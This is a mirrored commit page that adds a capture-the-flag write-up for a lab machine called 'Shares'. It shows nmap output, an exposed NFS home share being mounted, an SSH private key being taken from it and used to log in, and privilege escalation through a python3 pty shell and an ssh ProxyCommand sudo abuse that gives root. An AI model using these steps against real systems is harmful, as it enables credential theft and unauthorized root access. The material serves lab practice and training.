mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-21 19:43:03 +00:00
Add files via upload
This commit is contained in:
parent
1868516736
commit
1d5be985a3
1 changed files with 151 additions and 0 deletions
151
Cybersec Labs/Shares.md
Normal file
151
Cybersec Labs/Shares.md
Normal file
|
@ -0,0 +1,151 @@
|
|||
# Cybersec Labs- Shares
|
||||
|
||||
## NMAP
|
||||
|
||||
```
|
||||
Nmap scan report for 172.31.1.7
|
||||
Host is up (0.23s latency).
|
||||
Not shown: 996 closed ports
|
||||
PORT STATE SERVICE VERSION
|
||||
21/tcp open ftp vsftpd 3.0.3
|
||||
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|
||||
|_http-server-header: Apache/2.4.29 (Ubuntu)
|
||||
|_http-title: Pet Shop
|
||||
111/tcp open rpcbind 2-4 (RPC #100000)
|
||||
| rpcinfo:
|
||||
| program version port/proto service
|
||||
| 100000 2,3,4 111/tcp rpcbind
|
||||
| 100000 2,3,4 111/udp rpcbind
|
||||
| 100000 3,4 111/tcp6 rpcbind
|
||||
| 100000 3,4 111/udp6 rpcbind
|
||||
| 100003 3 2049/udp nfs
|
||||
| 100003 3 2049/udp6 nfs
|
||||
| 100003 3,4 2049/tcp nfs
|
||||
| 100003 3,4 2049/tcp6 nfs
|
||||
| 100005 1,2,3 33249/tcp mountd
|
||||
| 100005 1,2,3 34467/tcp6 mountd
|
||||
| 100005 1,2,3 39042/udp6 mountd
|
||||
| 100005 1,2,3 41578/udp mountd
|
||||
| 100021 1,3,4 37885/udp6 nlockmgr
|
||||
| 100021 1,3,4 38607/tcp nlockmgr
|
||||
| 100021 1,3,4 43063/tcp6 nlockmgr
|
||||
| 100021 1,3,4 51017/udp nlockmgr
|
||||
| 100227 3 2049/tcp nfs_acl
|
||||
| 100227 3 2049/tcp6 nfs_acl
|
||||
| 100227 3 2049/udp nfs_acl
|
||||
|_ 100227 3 2049/udp6 nfs_acl
|
||||
2049/tcp open nfs_acl 3 (RPC #100227)
|
||||
27853/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|
||||
| ssh-hostkey:
|
||||
| 2048 97:93:e4:7f:41:79:9c:bd:3d:d8:90:c3:93:d5:53:9f (RSA)
|
||||
| 256 11:66:e9:84:32:85:7b:c7:88:f3:19:97:74:1e:6c:29 (ECDSA)
|
||||
|_ 256 cc:66:1e:1a:91:31:56:56:7c:e5:d3:46:5d:68:2a:b7 (ED25519)
|
||||
33249/tcp open mountd 1-3 (RPC #100005)
|
||||
38607/tcp open nlockmgr 1-4 (RPC #100021)
|
||||
49481/tcp open mountd 1-3 (RPC #100005)
|
||||
52729/tcp open mountd 1-3 (RPC #100005)
|
||||
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||||
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
Nmap done: 1 IP address (1 host up) scanned in 1699.29 seconds
|
||||
```
|
||||
|
||||
## PORT 80
|
||||
|
||||
<img src="https://imgur.com/n71SA8a.png"/>
|
||||
|
||||
We see nothing on port 80
|
||||
|
||||
## PORT 2049 (NFS)
|
||||
|
||||
Now we can see which shares are avaiable for us to mount
|
||||
|
||||
`showmount -e 172.31.1.7` this gives us
|
||||
```
|
||||
Export list for 172.31.1.7:
|
||||
/home/amir *.*.*.*
|
||||
```
|
||||
Now mounting it
|
||||
```
|
||||
root@kali:~/Cybersec Labs/Easy/Shares# mkdir shares
|
||||
root@kali:~/Cybersec Labs/Easy/Shares# mount 172.31.1.7:/home/amir shares/
|
||||
root@kali:~/Cybersec Labs/Easy/Shares# ls
|
||||
shares Shares.md
|
||||
root@kali:~/Cybersec Labs/Easy/Shares# cs shares/
|
||||
-bash: cs: command not found
|
||||
root@kali:~/Cybersec Labs/Easy/Shares# cd shares/
|
||||
lroot@kali:~/Cybersec Labs/Easy/Shares/shares# ls -al
|
||||
total 40
|
||||
drwxrwxr-x 5 arz arz 4096 Apr 2 2020 .
|
||||
drwxr-xr-x 3 root root 4096 Nov 6 00:09 ..
|
||||
-rw-r--r-- 1 arz arz 0 Apr 2 2020 .bash_history
|
||||
-rw-r--r-- 1 arz arz 220 Apr 4 2018 .bash_logout
|
||||
-rw-r--r-- 1 arz arz 3786 Apr 2 2020 .bashrc
|
||||
drw-r--r-- 2 arz arz 4096 Apr 2 2020 .cache
|
||||
drw-r--r-- 3 arz arz 4096 Apr 2 2020 .gnupg
|
||||
-rw-r--r-- 1 arz arz 807 Apr 4 2018 .profile
|
||||
drwxrwxr-x 2 arz arz 4096 Apr 2 2020 .ssh
|
||||
-rw-r--r-- 1 arz arz 0 Apr 2 2020 .sudo_as_admin_successful
|
||||
-rw-r--r-- 1 arz arz 7713 Apr 2 2020 .viminfo
|
||||
```
|
||||
We see .ssh folder and we know that there is a port `27853` which is ruuning SSH
|
||||
|
||||
Copy `id_rsa.pk` and rename it to `id_rsa` also change it's permissions to `600`
|
||||
|
||||
<img src="https://imgur.com/x9BRt7V.png"/>
|
||||
|
||||
We got the ssh key as we mounted `/home/amir` so username is `amir`
|
||||
|
||||
|
||||
## PORT 27853 (SSH)
|
||||
|
||||
```
|
||||
root@kali:~/Cybersec Labs/Easy/Shares# ssh amir@172.31.1.7 -i id_rsa -p 27853
|
||||
load pubkey "id_rsa": invalid format
|
||||
The authenticity of host '[172.31.1.7]:27853 ([172.31.1.7]:27853)' can't be established.
|
||||
ECDSA key fingerprint is SHA256:dX2FJGyXzJVAvDXJL9rdhs2OdMiqVz12PvrXkSdH+T4.
|
||||
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
|
||||
Warning: Permanently added '[172.31.1.7]:27853' (ECDSA) to the list of known hosts.
|
||||
Enter passphrase for key 'id_rsa':
|
||||
|
||||
```
|
||||
But it's asking for passpharse for id_rsa
|
||||
|
||||
<img src="https://imgur.com/5lOVyHO.png"/>
|
||||
|
||||
<img src="https://imgur.com/5lOVyHO.png"/>
|
||||
|
||||
## Privilege Escalation
|
||||
|
||||
<img src="https://imgur.com/K0f2zXP.png"/>
|
||||
|
||||
We can run python3 as `amy` but not as `root`
|
||||
|
||||
so
|
||||
|
||||
```
|
||||
sudo -u amy /usr/bin/python3 -c "import pty;pty.spawn('/bin/bash')";
|
||||
```
|
||||
This will give us a bash shell as `amy`
|
||||
|
||||
|
||||
```
|
||||
amy@shares:/home$ sudo -l
|
||||
Matching Defaults entries for amy on shares:
|
||||
env_reset, mail_badpass,
|
||||
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
|
||||
|
||||
User amy may run the following commands on shares:
|
||||
(ALL) NOPASSWD: /usr/bin/ssh
|
||||
amy@shares:/home$
|
||||
|
||||
|
||||
```
|
||||
|
||||
https://gtfobins.github.io/gtfobins/ssh/
|
||||
|
||||
```
|
||||
amy@shares:/home$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
||||
# bash
|
||||
root@shares:/home#
|
||||
```
|
||||
We are root !
|
Loading…
Reference in a new issue